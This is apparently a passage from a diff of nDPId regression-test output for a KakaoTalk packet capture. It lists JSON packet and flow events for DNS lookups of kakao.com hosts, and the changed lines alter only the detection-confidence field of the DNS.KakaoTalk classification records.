00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1430069022042,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":166,"pkt_l4_len":130,"thread_ts_msec":1430069022042,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAJbtdwAANREvTwq8AQEKGFK8ADXh2ACCeK5RAoGAAAEABQAAAAAGa2F0YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAAD9AAMBmthdGFsawJnbMATwC4AAQABAAAAegAEbkyOIsAuAAEAAQAAAHoABAHJAD3ALgABAAEAAAB6AAQByQA\/wC4AAQABAAAAegAEbkyNJQ=="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022007,"flow_last_seen":1430069022042,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069022042,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"katalk.kakao.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.142.34"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022007,"flow_last_seen":1430069022042,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069022042,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"katalk.kakao.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.142.34"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022058,"flow_last_seen":1430069022058,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1430069022058,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1430069022058,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":84,"pkt_l4_len":48,"thread_ts_msec":1430069022058,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEQAAEAAQBHSGAoYUrwKvAEBo7UANQAwrR37RAEAAAEAAAAAAAAHYm9va2luZwRsb2NvBWtha2FvA2NvbQAAAQAB"} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022058,"flow_last_seen":1430069022058,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1430069022058,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"booking.loco.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022058,"flow_last_seen":1430069022058,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1430069022058,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"booking.loco.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022059,"flow_last_seen":1430069022059,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022059,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1430069022059,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1430069022059,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEBMmwANQAtbIX3UQEAAAEAAAAAAAAEdXAtbQR0YWxrBWtha2FvA2NvbQAAAQAB"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022059,"flow_last_seen":1430069022059,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022059,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-m.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022059,"flow_last_seen":1430069022059,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022059,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-m.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022059,"flow_last_seen":1430069022059,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1430069022059,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1430069022059,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069022059,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwAAEAAQBHSIAoYUrwKvAEB5boANQAoZpVNewEAAAEAAAAAAAAEaXRlbQVrYWthbwNjb20AAAEAAQ=="} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022059,"flow_last_seen":1430069022059,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1430069022059,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"item.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022059,"flow_last_seen":1430069022059,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1430069022059,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"item.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1430069022093,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":114,"pkt_l4_len":78,"thread_ts_msec":1430069022093,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGIb1QAANREBJgq8AQEKGFK8ADXlugBOjwdNe4GAAAEAAgAAAAAEaXRlbQVrYWthbwNjb20AAAEAAcAMAAUAAQAABdUACgRpdGVtAmdswBHALAABAAEAAADUAATSZ\/AP"} -00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022093,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069022093,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"item.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}} +00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022093,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069022093,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"item.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1430069022094,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":124,"pkt_l4_len":88,"thread_ts_msec":1430069022094,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGzteAAANREveAq8AQEKGFK8ADUybABYuHj3UYGAAAEAAgAAAAAEdXAtbQR0YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAAD8wAPBHVwLW0EdGFsawJnbMAWwDEAAQABAAAAeAAE0mfwEA=="} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022094,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069022094,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-m.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022094,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069022094,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-m.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}} 00561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1430069022094,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":130,"pkt_l4_len":94,"thread_ts_msec":1430069022094,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAHLteQAANREvcQq8AQEKGFK8ADWjtQBeT7D7RIGAAAEAAgAAAAAHYm9va2luZwRsb2NvBWtha2FvA2NvbQAAAQABwAwABQABAAAD8wASB2Jvb2tpbmcEbG9jbwJnbMAZwDQAAQABAAAAeAAEbkyOfQ=="} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022058,"flow_last_seen":1430069022094,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069022094,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"booking.loco.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.142.125"}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022058,"flow_last_seen":1430069022094,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069022094,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"booking.loco.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.142.125"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022100,"flow_last_seen":1430069022100,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022100,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1430069022100,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1430069022100,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEBFykANQAtVi4l7AEAAAEAAAAAAAAEdXAtcAR0YWxrBWtha2FvA2NvbQAAAQAB"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022100,"flow_last_seen":1430069022100,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022100,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-p.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022100,"flow_last_seen":1430069022100,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022100,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-p.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022104,"flow_last_seen":1430069022104,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022104,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1430069022104,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1430069022104,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEBI4YANQAt2SeQlQEAAAEAAAAAAAAEdXAtdgR0YWxrBWtha2FvA2NvbQAAAQAB"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022104,"flow_last_seen":1430069022104,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022104,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-v.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022104,"flow_last_seen":1430069022104,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022104,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-v.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022105,"flow_last_seen":1430069022105,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022105,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1430069022105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1430069022105,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEB3fQANQAtU9dudwEAAAEAAAAAAAAEdXAtYwR0YWxrBWtha2FvA2NvbQAAAQAB"} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022105,"flow_last_seen":1430069022105,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022105,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-c.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022105,"flow_last_seen":1430069022105,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022105,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-c.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1430069022234,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":124,"pkt_l4_len":88,"thread_ts_msec":1430069022234,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGwb1gAANREBGwq8AQEKGFK8ADUXKQBYAAol7IGAAAEAAgAAAAAEdXAtcAR0YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAAFlQAPBHVwLXAEdGFsawJnbMAWwDEAAQABAAAAiwAE0mfwEA=="} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022100,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069022234,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-p.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}} 